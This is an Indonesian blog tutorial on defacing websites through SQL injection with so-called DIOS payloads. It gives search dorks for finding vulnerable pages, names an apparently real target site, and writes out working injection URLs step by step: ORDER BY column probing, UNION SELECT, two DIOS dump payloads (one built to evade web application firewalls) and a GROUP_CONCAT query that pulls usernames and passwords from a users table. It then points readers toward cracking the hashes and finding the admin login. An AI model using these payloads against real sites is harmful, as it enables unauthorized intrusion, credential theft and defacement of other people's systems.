Deface dengan SQL Injection With DIOS 2018

Deface dengan SQL Injection With DIOS 2018



Assalamualaikum Warahmatullahi Wabarakatuh.
Kali Ini Gua Akan Share Cara Deface Dengan SQL Injection With DIOS
Yeah v; Tehknik Ini Cukup DiBilang Lebih Simple Dari SQL Injection Manual v; … Sebenarnya Gua Mau Share “Apa Itu SQL Injection” Terlebih Dahulu V; Tapi Males Guanya V;
Oke. Kita Ke KepengertianNya Dulu…

SQL Injection Merupakan Tehknik Deface Yang MenInjection KeSebuah URL. Dan Untuk DIOS Yaitu DUMP IN ONE SHOT. Jadi Gak Perlu Mengecek Brapa Versionnya dan apalah itu V; .
 Bahan” Yang Perlukan ialah :
– Dork :
Inurl:profil.php?id= 
inurl:chart.php?id=
inurl:event.php?id=
inurl:events.php?id=
inurl:news.php?id=
– Android or Pc
– Kuota or Wifi
– Kasih Sayang V;
Lanjut Ke Prakteknya :
– Pertama Lu Dorking Dengan Dork Yang DiAtas Dengan Search Engine Andalan Mu.
Seperti Ini :
– Lalu Pilih Webiste Yang Sekiranya Itu VulN
dan gua memilih www.jmtv.com/news.php?id=3


> Cara Mengecek VulN Nya Gmna ?
Tinggal Kasih Petik / ‘ DiBlakang String atau Nomernya
Seperti http://www.jmtv.com/news.php?id=3′ <–
Tanda VulN Nya Yaitu terdapat sebuah teks “You have an error in your SQL syntax” Atau Halaman Page Nya Blank Atau Hilang Ada Juga Yang Beberapa Gambarnya Hilang.
Di Web Ini Error Nya Ada Tulisan “You have an error in your SQL syntax” BerArti VulN.


> Sekarang Kita Cek Brapa Table Pada Website Ini
Caranya Tambahkan +order+by+ diblakang url
Seperti –> www.jmtv.com/news.php?id=3+order+by+1–+
Gimana Cara Nyari Table Nya ? Kita Tebak angka saja diblakang kata by+ 
Contoh :
http://www.jmtv.com/news.php?id=3+order+by+1–+
( Masih Normal )
http://www.jmtv.com/news.php?id=3+order+by+2–+
( Masih Normal )
http://www.jmtv.com/news.php?id=3+order+by+3–+
( Masih Normal )



http://www.jmtv.com/news.php?id=3+order+by+4–+
( Unknown column 4 )
Berarti table nya cuman ada 3 
Dan tinggal cari table yang ada database atau yang vurnirable
Caranya :
http://www.jmtv.com/news.php?id=3+order+by+3–+
DiGanti Dengan
http://www.jmtv.com/news.php?id=3+union+select+1,2,3–+
Jadinya Seperti Ini :



Yang Gua Lingkarin itu nomer table yang vurnirable. Nahh karena tablenya sudah ketemu tinggal dikasih EXPLOIT Nya.
Exploitnya :
MadBlood DIOS :
(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))

 ZEN with WAF DIOS:
(/*!12345sELecT*/(@)from(/*!12345sELecT*/(@:=0x00),(/*!12345sELecT*/(@)from(`InFoRMAtiON_sCHeMa`.`ColUMNs`)where(`TAblE_sCHemA`=DatAbAsE/*data*/())and(@)in(@:=CoNCat%0a(@,0x3c62723e5461626c6520466f756e64203a20,TaBLe_nAMe,0x3a3a,column_name))))a)
Cara Kasih Exploitnya Yaitu Angka Yang Keluar Setelah Di Union+Select DiGanti Dengan EXPLOIT DiAtas… pilih salah satu ajah v;
Seperti ini nih :
http://www.jmtv.com/news.php?id=3+union+select+1,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),3–+
Hasilnya akan keluar database web nya v;



Nah Terdapat sebuah table yang bernama “users” yang memiliki username , password , email dll.
Tinggal Kita dump… caranyamenggunakan query GROUP_CONCAT.
Contoh : 
http://jmtv.com/news.php?id=3+union+select+1,group_concat(id,0x3a,username,0x3a,password),3+from+users–+-
Jadinya Seperti ini :



Nah V; Username dan Password Nya Dah Ketemu tinggal Kalian Hash Passwordnya dan cari admin login nya Deh.
Happy Suntik V;
Bantu share ya V;

Komentar

  1. Min kok gua kayak gini
    Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/*****/www/www/*******.php on line 136
    Note:* sensor itu

    BalasHapus
  2. Di android emang bisa nyari tempat login nya?

    BalasHapus

Posting Komentar

Postingan populer dari blog ini

Cara deface di android untuk pemula

Hack fb menggunakan apk copy9

Cara hac fb MBF/rombongan di termux